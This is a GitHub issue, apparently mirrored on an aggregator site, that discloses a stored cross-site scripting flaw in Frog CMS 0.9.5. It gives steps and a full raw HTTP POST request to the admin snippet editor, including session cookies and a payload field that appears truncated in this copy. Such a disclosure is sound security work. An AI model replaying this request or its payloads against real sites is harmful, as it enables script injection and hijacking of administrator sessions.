Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability

[Oran9e]

I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role：http://127.0.0.1/test/FrogCMS-master/admin/ publish an article，and you can click it. snippet-->Edit snippet-->Name payload："/>save it. i think you can see the following picture to konw more.</p> <p>exp: POST /test/FrogCMS-master/admin/?/snippet/edit/3 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,<em>/</em>;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: <a rel="noreferrer nofollow" target="_blank" href="http://127.0.0.1/test/FrogCMS-master/admin/?/snippet/edit/3">http://127.0.0.1/test/FrogCMS-master/admin/?/snippet/edit/3</a> Content-Type: application/x-www-form-urlencoded Content-Length: 114 Cookie: current_tab=:tab-1; expanded_rows=4; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e Connection: keep-alive Upgrade-Insecure-Requests: 1</p> <p>snippet%5Bname%5D="/>&commit=Save <img referrerpolicy="no-referrer" src="https://user-images.githubusercontent.com/26062651/39127445-a2de951c-4737-11e8-8ae4-d41b295eb1e7.jpg" alt="1" /> <img referrerpolicy="no-referrer" src="https://user-images.githubusercontent.com/26062651/39127451-a70385c6-4737-11e8-9294-5d1f0bc91ff2.jpg" alt="2" /> <img referrerpolicy="no-referrer" src="https://user-images.githubusercontent.com/26062651/39127455-a9e7b8fc-4737-11e8-8b42-3e60a408cf32.png" alt="3" /></p> <p>Affected Version: 0.9.5</p> </div> </div> <div class="page-bar-simple"> </div> <div class="footer"> <ul class="body"> <li>© <script> document.write(new Date().getFullYear()) </script> Githubissues.</li> <li>Githubissues is a development platform for aggregating issues.</li> </ul> </div> <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script> <script src="/githubissues/assets/js.js"></script> <script src="/githubissues/assets/markdown.js"></script> <script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.4.0/build/highlight.min.js"></script> <script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.4.0/build/languages/go.min.js"></script> <script> hljs.highlightAll(); </script> </body> </html>